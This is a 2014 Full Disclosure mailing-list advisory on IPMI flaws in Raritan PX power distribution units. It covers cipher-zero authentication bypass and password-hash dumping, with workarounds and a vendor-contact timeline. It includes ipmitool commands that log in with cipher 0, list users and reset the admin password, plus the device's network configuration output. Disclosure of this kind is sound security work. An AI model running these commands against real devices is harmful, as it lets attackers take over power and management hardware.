Raritan IPMI vulnerability

["Jörg Kost" <joerg.kost.fd () gmx eu>]

Vulnerability:

Raritan PX power distribution software contains several well known IPMI vulnerabilities, e.g.
- ipmi zero cipher
- ipmi dump hash passwords   

Details:
E.g. Model DPXR20A-16:   
Software release all before and including 01.05.08 (recent version from october 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo
ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print Set in Progress : Set Complete
Auth Type Support : NONE MD2 MD5 PASSWORD
Auth Type Enable : Callback :
: User : MD5
: Operator : MD5
: Admin : MD5
: OEM : MD5
IP Address Source : Unspecified IP Address : 17.XX.XX.XX
Subnet Mask : 255.255.255.224
MAC Address : 00:00:00:00:00:00
SNMP Community String : public
IP Header : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control : ARP Responses Enabled, Gratuitous ARP Disabled Gratituous ARP Intrvl : 2.0 seconds
Default Gateway IP : 17.XX.XX.XX
Default Gateway MAC : 00:00:00:00:00:00 Backup Gateway IP : 0.0.0.0
Backup Gateway MAC : 00:00:00:00:00:00 RMCP+ Cipher Suites : 0,1,2,3,6,7,8,11,12 Cipher Suite Priv Max : 
uuuOXXuuOXXuOXX : X=Cipher Suite Unused
: c=CALLBACK
: u=USER
: o=OPERA TOR
: a=ADMIN
: O=OEM    
 
 
Workaround:
- Block IPMI Port 623
- Hang to management network only
- Don't use Raritan
 
Timeline: 
2014/02/19 - Contacted CERT, VR#HRS35Y8S  
2014/05/20 - Vendor claims its fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims its fixed but still won't release new firmware to verify, neither won't send firmware to me. 
 
2014/07/03 - FD because lack of interest and time

Regards
Joerg

  
      

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/